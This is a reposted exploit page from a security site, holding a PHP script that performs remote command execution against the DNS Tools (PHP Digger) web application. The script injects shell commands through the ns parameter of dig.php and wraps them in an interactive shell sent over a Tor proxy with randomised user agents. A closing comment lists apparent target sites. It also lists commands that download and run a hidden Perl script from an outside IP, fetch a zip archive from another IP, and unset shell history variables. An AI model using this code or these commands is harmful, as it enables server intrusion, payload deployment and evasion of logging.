首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DNS Tools PHP Digger remote command execution exploit that acts like an interact
来源:www.mortal-team.org. 作者:Almeida 发布时间:2009-04-20  
<?php
/* 
 * DNS Tools (PHP Digger) Remote Command Execution (Interactive Shell)
 * 
 * Author: Ricardo Almeida
 * email:  ricardojba[at]aeiou[DoT]pt
 *
 * Credits: www.mortal-team.org
 * 
 */ 

function wrap($url){
  $ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver','Chrome');
  $op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX','Windows 7','Windows Vista');
  $agent  = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';
  # tor or other proxy
  $tor = '127.0.0.1:8118';
  $timeout = '300';
  $ack = curl_init(); 
  curl_setopt ($ack, CURLOPT_PROXY, $tor); 
  curl_setopt ($ack, CURLOPT_URL, $url);
  curl_setopt ($ack, CURLOPT_HEADER, 1);  
  curl_setopt ($ack, CURLOPT_USERAGENT, $agent); 
  curl_setopt ($ack, CURLOPT_RETURNTRANSFER, 1); 
  curl_setopt ($ack, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt ($ack, CURLOPT_TIMEOUT, $timeout);
  $syn = curl_exec($ack);
  $info = curl_getinfo($ack);
  curl_close($ack);   

  if($info['http_code'] == '200') {
    return $syn;
    die();
  } else {
    return "Fail! :".$info['http_code']."\r\n";
  }
}

if ($argc != 2) {die("Usage: dnstools.php <host>\n");}
array_shift($argv);
$host = $argv[0];

# Start the interactive shell
while(1){
  fwrite(STDOUT, "[shell:~ # ");
  $cmd = trim(fgets(STDIN));
  if ($cmd == "exit"){die();}
  else {
    $attackurl = "http://".$host."/dig.php?ns=||".$cmd."||&host=mortal-team.net&query_type=NS&status=digging";
    echo wrap($attackurl);
  }
}

/* 


opencrest.com/scripts/dnstools
www.taraservices.net/DNS_Tools


cd /var/tmp;wget -P/var/tmp http://195.23.32.146/fotos/docs/.log.pl;chmod +x .log.pl;./.log.pl

cd /var/tmp;./.log.pl

cd /var/tmp;wget http://88.157.89.41:81/htdocs.zip

unset HISTSAVE
unset HISTFILE
unset HISTFILESIZE
unset HISTORY
unset HISTSIZE
unset HISTZONE
*/
?>





 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Microsoft GDI Plugin .png Infi
·XRDP <= 0.4.1 Remote Buffer Ov
·Microsoft Media Player (quartz
·cTorrent/DTorrent (.Torrent Fi
·The Miniweb webserver suffers
·ClanTiger <= 1.1.1 (slug) Blin
·Apache Geronimo Application Se
·Linux Kernel 2.6 UDEV Local Pr
·MagicISO CCD/Cue Local Heap Ov
·eLitius 1.0 (manage-admin.php)
·MS Internet Explorer EMBED Mem
·Oracle APEX 3.2 Unprivileged D
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved